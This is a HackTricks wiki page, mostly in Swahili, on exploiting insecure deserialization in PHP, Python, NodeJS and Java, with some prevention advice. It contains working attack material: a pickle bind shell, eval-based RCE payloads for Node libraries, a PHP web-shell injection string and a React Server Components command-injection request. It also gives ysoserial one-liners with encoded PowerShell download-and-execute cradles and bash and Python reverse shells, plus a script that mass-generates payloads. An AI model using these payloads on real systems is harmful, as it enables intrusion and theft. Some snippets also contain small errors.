Deserialization

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa za Msingi

Serialization hueleweka kama njia ya kubadilisha object kuwa muundo unaoweza kuhifadhiwa, kwa lengo la kuhifadhi object au kuutuma kama sehemu ya mchakato wa mawasiliano. Mbinu hii kawaida hutumika kuhakikisha object inaweza kuundwa tena baadaye, ikihifadhi muundo na hali yake.

Deserialization, kwa upande mwingine, ni mchakato unaokinga na serialization. Inahusisha kuchukua data iliyopangwa katika muundo maalum na kuiunda upya kuwa object.

Deserialization inaweza kuwa hatari kwa sababu inawezekana kuwaruhusu washambuliaji kubadilisha serialized data ili kutekeleza code hatari au kusababisha tabia isiyotarajiwa katika application wakati wa mchakato wa ujenzi upya wa object.

PHP

Katika PHP, magic methods maalum hutumiwa wakati wa mchakato wa serialization na deserialization:

• __sleep: Huamuliwa wakati object inapo serialized. Njia hii inapaswa kurudisha array yenye majina ya properties za object ambazo zinapaswa kuwa serialized. Kwa kawaida hutumiwa kuandika data iliyokuwa inasubiri au kufanya kazi za kusafisha.
• __wakeup: Huitwa wakati object inapo deserialized. Hutumika kuanzisha upya database connections ambazo ziliweza kupotea wakati wa serialization na kufanya kazi nyingine za kuanzisha upya.
• __unserialize: Njia hii huitwa badala ya __wakeup (ikiwa ipo) wakati object inapo deserialized. Inatoa udhibiti zaidi juu ya mchakato wa deserialization ikilinganishwa na __wakeup.
• __destruct: Njia hii huitwa wakati object imekaribia kuharibiwa au script inaisha. Kwa kawaida hutumika kwa kazi za kusafisha, kama kufunga file handles au database connections.
• __toString: Njia hii inaruhusu object kutendewa kama string. Inaweza kutumiwa kusoma file au kazi nyingine kulingana na function calls ndani yake, kwa ufanisi ikitoa uwakilishi wa maandishi wa object.

<?php
class test {
public $s = "This is a test";
public function displaystring(){
echo $this->s.'<br />';
}
public function __toString()
{
echo '__toString method called';
}
public function __construct(){
echo "__construct method called";
}
public function __destruct(){
echo "__destruct method called";
}
public function __wakeup(){
echo "__wakeup method called";
}
public function __sleep(){
echo "__sleep method called";
return array("s"); #The "s" makes references to the public attribute
}
}

$o = new test();
$o->displaystring();
$ser=serialize($o);
echo $ser;
$unser=unserialize($ser);
$unser->displaystring();

/*
php > $o = new test();
__construct method called
__destruct method called
php > $o->displaystring();
This is a test<br />

php > $ser=serialize($o);
__sleep method called

php > echo $ser;
O:4:"test":1:{s:1:"s";s:14:"This is a test";}

php > $unser=unserialize($ser);
__wakeup method called
__destruct method called

php > $unser->displaystring();
This is a test<br />
*/
?>

Ikiwa utaangalia matokeo utaona kuwa functions __wakeup na __destruct zinaitwa wakati object inapofanywa deserialized. Kumbuka kwamba katika mafunzo kadhaa utagundua kuwa function __toString inaitwa unapojaribu kuchapisha sifa fulani, lakini kwaonekana hiyo haifanyi tena.

Warning

Mbinu __unserialize(array $data) inaitwa badala ya __wakeup() ikiwa imeimplementwa katika class. Inakuwezesha ku-unserialize object kwa kutoa data iliyoserialized kama array. Unaweza kutumia mbinu hii ku-unserialize properties na kufanya kazi yoyote muhimu wakati wa deserialization.

class MyClass {
   private $property;

   public function __unserialize(array $data): void {
       $this->property = $data['property'];
       // Perform any necessary tasks upon deserialization.
   }
}

Unaweza kusoma mfano wa PHP ulioelezewa hapa: https://www.notsosecure.com/remote-code-execution-via-php-unserialize/, hapa https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf au hapa https://securitycafe.ro/2015/01/05/understanding-php-object-injection/

PHP Deserial + Autoload Classes

Unaweza kutumia vibaya functionality ya PHP autoload ili kupakia faili za php chochote na zaidi:

PHP - Deserialization + Autoload Classes

Laravel Livewire Hydration Chains

Livewire 3 synthesizers zinaweza kulazimishwa kuunda arbitrary gadget graphs (kwa au bila APP_KEY) ili kufikia Laravel Queueable/SerializableClosure sinks:

Livewire Hydration Synthesizer Abuse

Serializing Referenced Values

Ikiwa kwa sababu fulani unataka ku-serialize thamani kama marejeleo kwa thamani nyingine iliyoserialized unaweza:

<?php
class AClass {
public $param1;
public $param2;
}

$o = new WeirdGreeting;
$o->param1 =& $o->param22;
$o->param = "PARAM";
$ser=serialize($o);

Kuzuia PHP Object Injection with allowed_classes

[!INFO] Msaada kwa kigezo cha pili cha unserialize() (the $options array) uliongezwa katika PHP 7.0. Katika matoleo ya zamani kazi hiyo inakubali tu mnyororo ulioserializwa, na kufanya isiwezekane kuweka vikwazo juu ya madarasa yanayoweza kuanzishwa.

unserialize() itaunda kila darasa itakalokutana nalo ndani ya mnyororo ulioserialishwa isipokuwa imeelezwa vinginevyo. Tangu PHP 7, tabia inaweza kudhibitiwa kwa chaguo la allowed_classes:

// NEVER DO THIS – full object instantiation
$object = unserialize($userControlledData);

// SAFER – disable object instantiation completely
$object = unserialize($userControlledData, [
'allowed_classes' => false    // no classes may be created
]);

// Granular – only allow a strict white-list of models
$object = unserialize($userControlledData, [
'allowed_classes' => [MyModel::class, DateTime::class]
]);

Ikiwa allowed_classes imetupwa au msimbo unakimbia kwenye PHP < 7.0, wito unakuwa hatari kwani mshambuliaji anaweza kutengeneza payload inayotumia vibaya magic methods kama __wakeup() au __destruct() ili kupata Remote Code Execution (RCE).

Mfano halisi: Everest Forms (WordPress) CVE-2025-52709

Plugin ya WordPress Everest Forms ≤ 3.2.2 ilijaribu kuwa ya kujikinga kwa kutumia helper wrapper lakini ilisahau kuhusu matoleo ya zamani ya PHP:

function evf_maybe_unserialize($data, $options = array()) {
if (is_serialized($data)) {
if (version_compare(PHP_VERSION, '7.1.0', '>=')) {
// SAFE branch (PHP ≥ 7.1)
$options = wp_parse_args($options, array('allowed_classes' => false));
return @unserialize(trim($data), $options);
}
// DANGEROUS branch (PHP < 7.1)
return @unserialize(trim($data));
}
return $data;
}

Kwa seva ambazo bado zinaendesha PHP ≤ 7.0, tawi hili la pili lilisababisha PHP Object Injection ya kawaida wakati msimamizi alifungua uwasilishaji wa fomu wenye madhara. Payload ndogo ya exploit inaweza kuonekana kama:

O:8:"SomeClass":1:{s:8:"property";s:28:"<?php system($_GET['cmd']); ?>";}

Mara tu admin alipotazama kipengee, object ilianzishwa na SomeClass::__destruct() ilitekelezwa, ikasababisha utekelezaji wa msimbo wowote.

Vidokezo

1. Daima pita ['allowed_classes' => false] (au orodha nyeupe kali) unapotumia unserialize().
2. Kagua defensive wrappers – mara nyingi husahau matawi ya zamani ya PHP.
3. Kuongeza toleo hadi PHP ≥ 7.x pekee haitoshi: chaguo bado kinapaswa kutolewa kwa uwazi.

PHPGGC (ysoserial for PHP)

PHPGGC inaweza kukusaidia kuunda payloads za kuabusu PHP deserializations.
Kumbuka kwamba katika kesi kadhaa huwezi kupata njia ya kuabusu deserialization katika msimbo wa chanzo wa programu, lakini huenda ukaweza kuabusu msimbo wa extensions za nje za PHP.
Hivyo, ikiwa unaweza, angalia phpinfo() ya server na tafuta mtandaoni (hata kwenye gadgets za PHPGGC) baadhi ya gadgets unazoweza kuabusu.

phar:// metadata deserialization

If you have found a LFI that is just reading the file and not executing the php code inside of it, for example using functions like file_get_contents(), fopen(), file() or file_exists(), md5_file(), filemtime() or filesize(). You can try to abuse a deserialization occurring when reading a file using the phar protocol.
For more information read the following post:

phar:// deserialization

Python

Pickle

Wakati object inapofanyiwa unpickle, function ___reduce___ itaendeshwa.
Ikiwa itatumika vibaya, server inaweza kurudisha hitilafu.

import pickle, os, base64
class P(object):
def __reduce__(self):
return (os.system,("netcat -c '/bin/bash -i' -l -p 1234 ",))
print(base64.b64encode(pickle.dumps(P())))

Kabla ya kuangalia mbinu ya bypass, jaribu kutumia print(base64.b64encode(pickle.dumps(P(),2))) ili kuunda object inayofaa kwa python2 ikiwa unafanya kazi kwa python3.

Kwa habari zaidi kuhusu kutoroka kutoka pickle jails angalia:

Bypass Python sandboxes

Yaml & jsonpickle

Ukurasa ufuatao unaelezea mbinu ya kuutumia vibaya unsafe deserialization katika maktaba za python za yamls na unamaliza kwa chombo kinachoweza kutumika kutengeneza payload za RCE za deserialization kwa Pickle, PyYAML, jsonpickle and ruamel.yaml:

Python Yaml Deserialization

Class Pollution (Python Prototype Pollution)

Class Pollution (Python’s Prototype Pollution)

NodeJS

JS Magic Functions

JS doesn’t have “magic” functions kama PHP au Python ambazo zinatekelezwa tu kwa ajili ya kuunda object. Lakini ina baadhi ya functions ambazo hutumika mara kwa mara hata bila kuitwa moja kwa moja kama toString, valueOf, toJSON.
Ikiwa ukitumia deserialization vibaya unaweza kuathiri hizi functions ili kutekeleza code nyingine (kwa kutumika pia prototype pollutions) na hivyo unaweza kutekeleza code ya hiari unapozipata.

Another “magic” way to call a function without calling it directly is by compromising an object that is returned by an async function (promise). Because, if you transform that return object in another promise with a property called “then” of type function, it will be executed just because it’s returned by another promise. Follow this link for more info.

// If you can compromise p (returned object) to be a promise
// it will be executed just because it's the return object of an async function:
async function test_resolve() {
const p = new Promise((resolve) => {
console.log("hello")
resolve()
})
return p
}

async function test_then() {
const p = new Promise((then) => {
console.log("hello")
return 1
})
return p
}

test_ressolve()
test_then()
//For more info: https://blog.huli.tw/2022/07/11/en/googlectf-2022-horkos-writeup/

__proto__ and prototype pollution

Ikiwa unataka kujifunza kuhusu tekniki hii tazama mafunzo yafuatayo:

NodeJS - proto & prototype Pollution

node-serialize

Maktaba hii inaruhusu serialise functions. Mfano:

var y = {
rce: function () {
require("child_process").exec("ls /", function (error, stdout, stderr) {
console.log(stdout)
})
},
}
var serialize = require("node-serialize")
var payload_serialized = serialize.serialize(y)
console.log("Serialized: \n" + payload_serialized)

Kitu kilichoseriwalishwa kitaonekana kama:

{"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })}"}

Unaweza kuona kwenye mfano kwamba wakati function inapofanywa serialized bendera _$$ND_FUNC$$_ inaambatishwa kwenye serialized object.

Ndani ya faili node-serialize/lib/serialize.js utaona bendera ile ile na jinsi code inavyoiitumia.

Kama unavyoona katika kipande cha mwisho cha code, ikiwa bendera imetambuliwa eval inatumiwa ku-deserialize function, kwa hivyo kwa msingi user input inatumiwa ndani ya eval function.

Walakini, just serialising function haitatekelezwa kwa sababu inahitajika sehemu ya code iitaye y.rce katika mfano wetu na hiyo ni haiwezekani sana.
Hata hivyo, unaweza tu modify the serialised object adding some parenthesis ili auto execute the serialized function wakati the object itakapodeserialized.
Katika kipande cha code kinachofuata zingatia parenthesis ya mwisho na jinsi function ya unserialize itakavyotekeleza code moja kwa moja:

var serialize = require("node-serialize")
var test = {
rce: "_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) }); }()",
}
serialize.unserialize(test)

Kama ilivyosemwa awali, maktaba hii itachukua code inayofuata _$$ND_FUNC$$_ na itafanya execute it kwa kutumia eval. Kwa hivyo, ili auto-execute code unaweza delete the function creation sehemu na the last parenthesis kisha just execute a JS oneliner kama katika mfano ufuatao:

var serialize = require("node-serialize")
var test =
"{\"rce\":\"_$$ND_FUNC$$_require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })\"}"
serialize.unserialize(test)

You can find here taarifa zaidi kuhusu jinsi ya ku-exploit udhaifu huu.

funcster

Sehemu muhimu kuhusu funcster ni kutokuwepo kwa upatikanaji wa standard built-in objects; ziko nje ya eneo linaloweza kufikiwa. Kizuizi hiki kinazuia utekelezaji wa code inayojaribu kuitisha methods kwenye built-in objects, na kusababisha exceptions kama “ReferenceError: console is not defined” wakati amri kama console.log() au require(something) zinapotumika.

Licha ya kizuizi hiki, urejeshaji wa upatikanaji kamili wa global context, ikiwa ni pamoja na standard built-in objects zote, unaweza kufanyika kupitia njia maalum. Kwa kuingia moja kwa moja kwenye global context, mtu anaweza kuiepuka kizuizi hiki. Kwa mfano, upatikanaji unaweza kurejeshwa kwa kutumia snippet ifuatayo:

funcster = require("funcster")
//Serialization
var test = funcster.serialize(function () {
return "Hello world!"
})
console.log(test) // { __js_function: 'function(){return"Hello world!"}' }

//Deserialization with auto-execution
var desertest1 = { __js_function: 'function(){return "Hello world!"}()' }
funcster.deepDeserialize(desertest1)
var desertest2 = {
__js_function: 'this.constructor.constructor("console.log(1111)")()',
}
funcster.deepDeserialize(desertest2)
var desertest3 = {
__js_function:
"this.constructor.constructor(\"require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });\")()",
}
funcster.deepDeserialize(desertest3)

For more information read this source.

serialize-javascript

Kifurushi cha serialize-javascript kimeundwa mahsusi kwa ajili ya matumizi ya serialization tu, hakina uwezo wowote wa deserialization uliyojengwa ndani. Watumiaji wanawajibika kutekeleza njia zao za deserialization. Mfano rasmi unapendekeza matumizi ya moja kwa moja ya eval kwa ajili ya kubadili data iliyoserialishwa:

function deserialize(serializedJavascript) {
return eval("(" + serializedJavascript + ")")
}

Ikiwa function hii inatumiwa ku deserialize objects unaweza easily exploit it:

var serialize = require("serialize-javascript")
//Serialization
var test = serialize(function () {
return "Hello world!"
})
console.log(test) //function() { return "Hello world!" }

//Deserialization
var test =
"function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) }); }()"
deserialize(test)

Kwa maelezo zaidi soma chanzo hiki.

Cryo library

Katika kurasa zifuatazo unaweza kupata taarifa kuhusu jinsi ya kutumia maktaba hii vibaya ili kutekeleza amri za hiari:

• https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/
• https://hackerone.com/reports/350418

React Server Components / react-server-dom-webpack Server Actions Abuse (CVE-2025-55182)

React Server Components (RSC) hutegemea react-server-dom-webpack (RSDW) ili kuchakata server action submissions zinazotumwa kama multipart/form-data. Kila submission ya action ina:

• $ACTION_REF_<n> sehemu ambazo zinarejea action inayoitwa.
• $ACTION_<n>:<m> sehemu ambazo mwili wake ni JSON kama {"id":"module-path#export","bound":[arg0,arg1,...]}.

Katika toleo 19.2.0 helper decodeAction(formData, serverManifest) huamini bila kuchunguza zote id string (inayochagua ni export gani ya module ya kuitisha) na bound array (vigezo). Ikiwa mshambuliaji anaweza kufikia endpoint inayotuma requests kwa decodeAction, wanaweza kuitisha server action yoyote exported pamoja na vigezo vinavyodhibitiwa na mshambuliaji hata bila front-end ya React (CVE-2025-55182). Mwongozo toka mwanzo hadi mwisho ni:

1. Jifunze kitambulisho cha action. Bundle output, error traces au leaked manifests kawaida huweka wazi maandishi kama app/server-actions#generateReport.
2. Tengeneza tena multipart payload. Unda sehemu ya $ACTION_REF_0 na body ya JSON $ACTION_0:0 yenye kitambulisho na vigezo vya hiari.
3. Ruhusu decodeAction iitume. Helper hutatua module kutoka serverManifest, ina-import export, na inarudisha callable ambayo server inatekeleza mara moja.

Mfano wa payload inayolenga /formaction:

POST /formaction HTTP/1.1
Host: target
Content-Type: multipart/form-data; boundary=----BOUNDARY

------BOUNDARY
Content-Disposition: form-data; name="$ACTION_REF_0"

------BOUNDARY
Content-Disposition: form-data; name="$ACTION_0:0"

{"id":"app/server-actions#generateReport","bound":["acme","pdf & whoami"]}
------BOUNDARY--

Au kwa curl:

curl -sk -X POST http://target/formaction \
-F '$ACTION_REF_0=' \
-F '$ACTION_0:0={"id":"app/server-actions#generateReport","bound":["acme","pdf & whoami"]}'

Array ya bound hujaza moja kwa moja vigezo vya server-action. Katika maabara yenye udhaifu gadget inaonekana kama:

const { exec } = require("child_process");
const util = require("util");
const pexec = util.promisify(exec);

async function generateReport(project, format) {
const cmd = `node ./scripts/report.js --project=${project} --format=${format}`;
const { stdout } = await pexec(cmd);
return stdout;
}

Supplying format = "pdf & whoami" makes /bin/sh -c run the legitimate report generator and then whoami, with both outputs delivered inside the JSON action response. Any server action that wraps filesystem primitives, database drivers or other interpreters can be abused the same way once the mshambuliaji controls the bound data.

Mshambuliaji hahitaji mteja halisi wa React—any HTTP tool that emits the $ACTION_* multipart shape can directly call server actions and chain the resulting JSON output into an RCE primitive.

Java - HTTP

In Java, deserialization callbacks are executed during the process of deserialization. Utekelezaji huu unaweza kutumiwa na washambuliaji wanaounda malicious payloads zinazochochea callbacks hizi, na kusababisha utekelezaji wa vitendo hatarishi.

Fingerprints

White Box

To identify potential serialization vulnerabilities in the codebase search for:

• Madarasa yanayotekeleza interface Serializable.
• Matumizi ya java.io.ObjectInputStream, readObject, readUnshare.

Pay extra attention to:

• XMLDecoder utilized with parameters defined by external users.
• XStream’s fromXML method, especially if the XStream version is less than or equal to 1.46, as it is susceptible to serialization issues.
• ObjectInputStream coupled with the readObject method.
• Implementation of methods such as readObject, readObjectNodData, readResolve, or readExternal.
• ObjectInputStream.readUnshared.
• General use of Serializable.

Black Box

For black box testing, look for specific signatures or “Magic Bytes” that denote java serialized objects (originating from ObjectInputStream):

• Hexadecimal pattern: AC ED 00 05.
• Base64 pattern: rO0.
• HTTP response headers with Content-type set to application/x-java-serialized-object.
• Hexadecimal pattern indicating prior compression: 1F 8B 08 00.
• Base64 pattern indicating prior compression: H4sIA.
• Web files with the .faces extension and the faces.ViewState parameter. Discovering these patterns in a web application should prompt an examination as detailed in the post about Java JSF ViewState Deserialization.

javax.faces.ViewState=rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwdAAML2xvZ2luLnhodG1s

Angalia kama imeathirika

Ikiwa ungependa learn about how does a Java Deserialized exploit work angalia Basic Java Deserialization, Java DNS Deserialization, na CommonsCollection1 Payload.

SignedObject-gated deserialization and pre-auth reachability

Mifumo ya kisasa ya code mara nyingine huzungusha deserialization ndani ya java.security.SignedObject na kuthibitisha signature kabla ya kuita getObject() (ambayo huendesha deserialization ya object ya ndani). Hii inazuia arbitrary top-level gadget classes lakini bado inaweza kuwa exploitable ikiwa attacker anaweza kupata valid signature (kwa mfano, private-key compromise au signing oracle). Zaidi ya hayo, error-handling flows zinaweza mint session-bound tokens kwa unauthenticated users, na hivyo exposing protected sinks pre-auth.

Kwa mfano wa kesi halisi yenye requests, IoCs, na mwongozo wa hardening, angalia:

Java Signedobject Gated Deserialization

White Box Test

Unaweza kuangalia ikiwa kuna programu yoyote iliyowekwa yenye vulnerabilities zinazojulikana.

find . -iname "*commons*collection*"
grep -R InvokeTransformer .

Unaweza kujaribu kukagua maktaba zote zinazojulikana kuwa hatarini na ambazo Ysoserial zinaweza kutoa exploit kwa ajili yao. Au unaweza kukagua maktaba zilizotajwa kwenye Java-Deserialization-Cheat-Sheet.
Unaweza pia kutumia gadgetinspector kutafuta mnyororo za gadget zinazoweza kutumika ku-exploit.
Unaporusha gadgetinspector (baada ya kui-build) usijali kuhusu maelfu ya warnings/errors inayoonyesha na uiruhusu itimize. Itaandika matokeo yote chini ya gadgetinspector/gadget-results/gadget-chains-year-month-day-hore-min.txt. Tafadhali, kumbuka kwamba gadgetinspector haitaunda exploit na inaweza kuonyesha false positives.

Mtihani wa Black Box

Kwa kutumia extension ya Burp gadgetprobe unaweza kubaini maktaba gani zipo (na hata matoleo). Kwa taarifa hizi inaweza kuwa rahisi kuchagua payload ya ku-exploit udhaifu huo.
Soma hii ili ujifunze zaidi kuhusu GadgetProbe.
GadgetProbe inalenga ObjectInputStream deserializations.

Kwa kutumia extension ya Burp Java Deserialization Scanner unaweza kubaini maktaba zilizo hatarini zinazoweza ku-exploit na ysoserial na kuzi-exploit.
Soma hii ili ujifunze zaidi kuhusu Java Deserialization Scanner.
Java Deserialization Scanner inalenga ObjectInputStream deserializations.

Unaweza pia kutumia Freddy kugundua udhaifu wa deserialization ndani ya Burp. Plugin hii itagundua sio tu ObjectInputStream zinazohusiana na udhaifu bali pia udhaifu kutoka kwa maktaba za deserialization za Json na Yml. Kwa mode ya active, itajaribu kuwathibitisha kwa kutumia sleep au DNS payloads.
Unaweza kupata taarifa zaidi kuhusu Freddy hapa.

Serialization Test

Sio kila kitu ni kuhusu kukagua ikiwa server inatumia maktaba iliyo hatarini. Wakati mwingine unaweza kufanikiwa kubadilisha data ndani ya object iliyoserializa na kupitisha baadhi ya ukaguzi (labda kukupa haki za admin ndani ya webapp).
Ikiwa unapata object ya java iliyoserializa ikitumwa kwa web application, unaweza kutumia SerializationDumper kuchapisha kwa format rahisi kusomeka zaidi object ya serialization inayotumwa. Kujua data unazotuma kutafanya iwe rahisi kuibadilisha na kupitisha baadhi ya ukaguzi.

Exploit

ysoserial

Tool kuu ya ku-exploit Java deserializations ni ysoserial (download here). Pia unaweza kuzingatia kutumia ysoseral-modified itakayokuruhusu kutumia commands ngumu (kwa mfano zenye pipes).
Kumbuka kwamba tool hii inalenga ku-exploit ObjectInputStream.
Ningependekeza kuanza kwa kutumia payload ya “URLDNS” kabla ya payload ya RCE ili kujaribu kama injection inawezekana. Hata hivyo, kumbuka kwamba huenda payload ya “URLDNS” haifanyi kazi lakini payload nyingine ya RCE iingie.

# PoC to make the application perform a DNS req
java -jar ysoserial-master-SNAPSHOT.jar URLDNS http://b7j40108s43ysmdpplgd3b7rdij87x.burpcollaborator.net > payload

# PoC RCE in Windows
# Ping
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections5 'cmd /c ping -n 5 127.0.0.1' > payload
# Time, I noticed the response too longer when this was used
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c timeout 5" > payload
# Create File
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c echo pwned> C:\\\\Users\\\\username\\\\pwn" > payload
# DNS request
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c nslookup jvikwa34jwgftvoxdz16jhpufllb90.burpcollaborator.net"
# HTTP request (+DNS)
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c certutil -urlcache -split -f http://j4ops7g6mi9w30verckjrk26txzqnf.burpcollaborator.net/a a"
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAYwBlADcAMABwAG8AbwB1ADAAaABlAGIAaQAzAHcAegB1AHMAMQB6ADIAYQBvADEAZgA3ADkAdgB5AC4AYgB1AHIAcABjAG8AbABsAGEAYgBvAHIAYQB0AG8AcgAuAG4AZQB0AC8AYQAnACkA"
## In the ast http request was encoded: IEX(New-Object Net.WebClient).downloadString('http://1ce70poou0hebi3wzus1z2ao1f79vy.burpcollaborator.net/a')
## To encode something in Base64 for Windows PS from linux you can use: echo -n "<PAYLOAD>" | iconv --to-code UTF-16LE | base64 -w0
# Reverse Shell
## Encoded: IEX(New-Object Net.WebClient).downloadString('http://192.168.1.4:8989/powercat.ps1')
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4ANAA6ADgAOQA4ADkALwBwAG8AdwBlAHIAYwBhAHQALgBwAHMAMQAnACkA"

#PoC RCE in Linux
# Ping
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "ping -c 5 192.168.1.4" > payload
# Time
## Using time in bash I didn't notice any difference in the timing of the response
# Create file
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "touch /tmp/pwn" > payload
# DNS request
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "dig ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net"
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "nslookup ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net"
# HTTP request (+DNS)
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "curl ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net" > payload
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "wget ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net"
# Reverse shell
## Encoded: bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" | base64 -w0
## Encoded: export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,ZXhwb3J0IFJIT1NUPSIxMjcuMC4wLjEiO2V4cG9ydCBSUE9SVD0xMjM0NTtweXRob24gLWMgJ2ltcG9ydCBzeXMsc29ja2V0LG9zLHB0eTtzPXNvY2tldC5zb2NrZXQoKTtzLmNvbm5lY3QoKG9zLmdldGVudigiUkhPU1QiKSxpbnQob3MuZ2V0ZW52KCJSUE9SVCIpKSkpO1tvcy5kdXAyKHMuZmlsZW5vKCksZmQpIGZvciBmZCBpbiAoMCwxLDIpXTtwdHkuc3Bhd24oIi9iaW4vc2giKSc=}|{base64,-d}|{bash,-i}"

# Base64 encode payload in base64
base64 -w0 payload

Unapounda payload kwa java.lang.Runtime.exec() huwezi kutumia alama maalum kama “>” au “|” kuielekeza pato la utekelezaji, “$()” kutekeleza amri au hata pass arguments kwa amri zilizotenganishwa kwa nafasi (unaweza kufanya echo -n "hello world" lakini huwezi kufanya python2 -c 'print "Hello world"'). Ili ku-encode payload kwa usahihi unaweza tumia ukurasa huu.

Jisikie huru kutumia script ifuatayo kuunda all the possible code execution payloads kwa Windows na Linux kisha kuzijaribu kwenye ukurasa wa wavuti ulio dhaifu:

import os
import base64

# You may need to update the payloads
payloads = ['BeanShell1', 'Clojure', 'CommonsBeanutils1', 'CommonsCollections1', 'CommonsCollections2', 'CommonsCollections3', 'CommonsCollections4', 'CommonsCollections5', 'CommonsCollections6', 'CommonsCollections7', 'Groovy1', 'Hibernate1', 'Hibernate2', 'JBossInterceptors1', 'JRMPClient', 'JSON1', 'JavassistWeld1', 'Jdk7u21', 'MozillaRhino1', 'MozillaRhino2', 'Myfaces1', 'Myfaces2', 'ROME', 'Spring1', 'Spring2', 'Vaadin1', 'Wicket1']
def generate(name, cmd):
for payload in payloads:
final = cmd.replace('REPLACE', payload)
print 'Generating ' + payload + ' for ' + name + '...'
command = os.popen('java -jar ysoserial.jar ' + payload + ' "' + final + '"')
result = command.read()
command.close()
encoded = base64.b64encode(result)
if encoded != "":
open(name + '_intruder.txt', 'a').write(encoded + '\n')

generate('Windows', 'ping -n 1 win.REPLACE.server.local')
generate('Linux', 'ping -c 1 nix.REPLACE.server.local')

serialkillerbypassgadgets

Unaweza kutumia https://github.com/pwntester/SerialKillerBypassGadgetCollection pamoja na ysoserial kuunda exploits zaidi. Taarifa zaidi kuhusu zana hii ziko katika slides za hotuba ambapo zana ilitangazwa: https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next_slideshow=1

marshalsec

marshalsec inaweza kutumika kuunda payloads za exploit kwa maktaba mbalimbali za serialization za Json na Yml katika Java.
Ili kucompile mradi nilihitaji kuongeza mategemeo haya kwenye pom.xml:

<dependency>
<groupId>javax.activation</groupId>
<artifactId>activation</artifactId>
<version>1.1.1</version>
</dependency>

<dependency>
<groupId>com.sun.jndi</groupId>
<artifactId>rmiregistry</artifactId>
<version>1.2.1</version>
<type>pom</type>
</dependency>

Sakinisha maven, na jenga mradi:

sudo apt-get install maven
mvn clean package -DskipTests

FastJSON

Soma zaidi kuhusu maktaba hii ya Java JSON: https://www.alphabot.com/security/blog/2020/java/Fastjson-exceptional-deserialization-vulnerabilities.html

Maabara

• Ikiwa ungependa kujaribu baadhi ya payloads za ysoserial unaweza endesha webapp hii: https://github.com/hvqzao/java-deserialize-webapp
• https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/

Kwa Nini

Java inatumia serialization kwa madhumuni mbalimbali kama:

• HTTP requests: Serialization inatumika sana katika usimamizi wa vigezo, ViewState, cookies, n.k.
• RMI (Remote Method Invocation): Protocol ya Java RMI, ambayo inategemea kabisa serialization, ni nguzo muhimu kwa mawasiliano ya mbali katika programu za Java.
• RMI over HTTP: Njia hii kwa kawaida hutumiwa na Java-based thick client web applications, zikitumia serialization kwa mawasiliano yote ya objects.
• JMX (Java Management Extensions): JMX inatumia serialization kusafirisha objects kupitia mtandao.
• Custom Protocols: Katika Java, desturi ya kawaida inahusisha uhamishaji wa raw Java objects, ambayo itaonyeshwa katika mifano ya exploits zijazo.

Kuzuia

Transient objects

A class that implements Serializable can implement as transient any object inside the class that shouldn’t be serializable. For example:

public class myAccount implements Serializable
{
private transient double profit; // declared transient
private transient double margin; // declared transient

Epuka Serialization ya darasa linalohitaji kutekeleza Serializable

